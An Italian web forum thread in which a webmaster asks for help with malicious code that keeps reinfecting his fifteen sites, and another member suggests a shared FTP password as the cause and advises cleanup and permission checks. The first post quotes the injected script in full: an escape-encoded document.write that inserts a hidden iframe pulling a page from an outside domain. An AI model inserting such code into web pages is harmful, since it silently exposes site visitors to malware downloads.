| Precedente :: Successivo |
| Autore |
Messaggio |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Sab Ott 27, 2007 12:11 pm Oggetto: codice maligno nelle mie pagine web...help me! |
|
|
Salve a tutti, sono un nuovo iscritto....ho un grosso problema spero che Voi possiate aiutarmi.
Non sono un grosso esperto ma come seconda attività creo e gestisco alcuni siti web (circa 15) e ultimamente in tutti i miei siti si è inserito un codice "maligno" che vi riporto:
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
tale codice, credo, provvede ad aprire un altro indirizzo effettuando un download di qualke file exe o rabba simile, sta di fatto che i miei antivirus lo rivelano!
nonstante io provveda a rimuoverlo da tutte le pagine html , per magia, dopo un po', ricomapare....
Ho provato anche a cambiare le psw ftp del mio host .....ma niente!
l'unica soluzione adesso da me adottata è stata la completa rimozione di tutti i file presenti nel mio spazio con conseguente frustrante disservizio per i miei cliente!
Anche la pagina semplice "sito in manutenzione" dopo un po' viene infettata!
P.s. ho anche formattato il mio pc e analizzato per bene tutte le mie pagine html.
Spero che qualcuno possa aiutarmi! Saluti Antonello |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum


Registrato: Jul 19, 2005 Messaggi: 2804 Località: cerco casa
|
Inviato: Sab Ott 27, 2007 2:12 pm Oggetto: |
|
|
è uno script criptato che appunto ti apre un altro indirizzo, se il tipo ha avuto accesso a tutti 15 i tuoi siti o ti conosce bene oppure hai la stessa pass per tutti i siti. _________________
 |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Sab Ott 27, 2007 3:10 pm Oggetto: |
|
|
| gizasmc ha scritto: | | è uno script criptato che appunto ti apre un altro indirizzo, se il tipo ha avuto accesso a tutti 15 i tuoi siti o ti conosce bene oppure hai la stessa pass per tutti i siti. |
ieri ho cambiato la psw ftp, mi è stata comunicata via telefono! poi ho formattato il pc, poi ho rinserito i miei siti via ftp!...ma stamattina ....la stessa cosa! Non so cosa fare! Grazie cmq per l'aiuto! Se hai in mente qualke soluzione, fammi sapere, te ne sono grato! |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum


Registrato: Jul 19, 2005 Messaggi: 2804 Località: cerco casa
|
Inviato: Sab Ott 27, 2007 3:21 pm Oggetto: |
|
|
a chi ti appoggi come hosting? forse il problema è su quei server, hai parlato del problema a loro? _________________
 |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Sab Ott 27, 2007 3:31 pm Oggetto: |
|
|
| ho parlato del problema con loro! anzi sono andato direttamente nei loro uffici, tra l'altro i tecnici sono anche dei miei amici ed tale problema è stato riscontrato solo all'interno del mio HOst! tutti gli altri migliaia di domini presenti suil loro server non hanno subito alcun danno! io credo sia un virus che invio io via ftp! |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Sab Ott 27, 2007 3:47 pm Oggetto: |
|
|
| opps scusami! cmq si! ho la stessa psw per tutti i miei siti, o meglio ho un'unica psw attraverso la quale accedo al mio intero spazio web! |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum


Registrato: Jul 19, 2005 Messaggi: 2804 Località: cerco casa
|
Inviato: Lun Ott 29, 2007 2:29 pm Oggetto: |
|
|
| cuba74 ha scritto: | | opps scusami! cmq si! ho la stessa psw per tutti i miei siti, o meglio ho un'unica psw attraverso la quale accedo al mio intero spazio web! | e ti hanno fregato per questo... 15 con un colpo solo, non sei stato tu tramite ftp. _________________
 |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Lun Ott 29, 2007 2:59 pm Oggetto: |
|
|
| gizasmc ha scritto: | | cuba74 ha scritto: | | opps scusami! cmq si! ho la stessa psw per tutti i miei siti, o meglio ho un'unica psw attraverso la quale accedo al mio intero spazio web! | e ti hanno fregato per questo... 15 con un colpo solo, non sei stato tu tramite ftp. |
cosa mi consigli? adesso ho tutti i miei siti off line! credi che basti cambiare nuovamente le psw....e magari attribuirne una ad ogni dominio? secondo te queste "iniezioni maligne" avvengono via ftp? dammi un tuo parere! grazie! |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum


Registrato: Jul 19, 2005 Messaggi: 2804 Località: cerco casa
|
Inviato: Lun Ott 29, 2007 3:04 pm Oggetto: |
|
|
secondo me è una cosa logica dare una pass diversa ad ogni dominio, se lo facevi prima forse non passavi tutto questo.
non so io proverei a svuotare i domini cambiare pass e prima di reinserire i siti ricontrollare le pagine per eliminare i codici che non conosci e sai di non aver inserito tu. _________________
 |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Lun Ott 29, 2007 3:25 pm Oggetto: |
|
|
| gizasmc ha scritto: | secondo me è una cosa logica dare una pass diversa ad ogni dominio, se lo facevi prima forse non passavi tutto questo.
non so io proverei a svuotare i domini cambiare pass e prima di reinserire i siti ricontrollare le pagine per eliminare i codici che non conosci e sai di non aver inserito tu. |
ok! grazie! provvederò a fare quanto mi hai detto, ti farò sapere! cmq sai se esiste un metodo per evitare la sovrascrittura dei file via ftp? |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum


Registrato: Jul 19, 2005 Messaggi: 2804 Località: cerco casa
|
Inviato: Lun Ott 29, 2007 3:53 pm Oggetto: |
|
|
dipende da che linguaggio usi per fare i siti _________________
 |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Lun Ott 29, 2007 4:17 pm Oggetto: |
|
|
| gizasmc ha scritto: | | dipende da che linguaggio usi per fare i siti |
io utilizzo esclusivamente html con qualche ritocco grafico in flash! basta così. I file che genero quindo sono tutti *htm e swf. |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum


Registrato: Oct 27, 2007 Messaggi: 9
|
Inviato: Lun Ott 29, 2007 5:30 pm Oggetto: |
|
|
| cuba74 ha scritto: | | gizasmc ha scritto: | | dipende da che linguaggio usi per fare i siti |
io utilizzo esclusivamente html con qualche ritocco grafico in flash! basta così. I file che genero quindo sono tutti *htm e swf. |
scusami ancora! ma in un altro forum mi hanno detto che tutto ciò potrebbe essere causato da utilizzo di alcuni contatore free, i quali creano un buco nel sistema di protezione del server, io in realtà su un mio sito avevo inserito SchinyStat, mi sai dire qualkosa a riguardo? |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum


Registrato: Jul 19, 2005 Messaggi: 2804 Località: cerco casa
|
Inviato: Lun Ott 29, 2007 5:33 pm Oggetto: |
|
|
di base una cosa pratica è aprire il tuo client ftp accedere al sito selezionare il file e col tasto destro andare su proprietà/CHMOD, da li controlli i permessi di scrittura. _________________
 |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum


Registrato: Jul 19, 2005 Messaggi: 2804 Località: cerco casa
|
Inviato: Lun Ott 29, 2007 5:37 pm Oggetto: |
|
|
mai avuto problemi con quel tipo di contatore anche se non mi piace più usarlo. cmq è vero che alcuni "gadget" presi da servizi online possono creare questi problemi. _________________
 |
|
| Torna in cima |
|
 |
|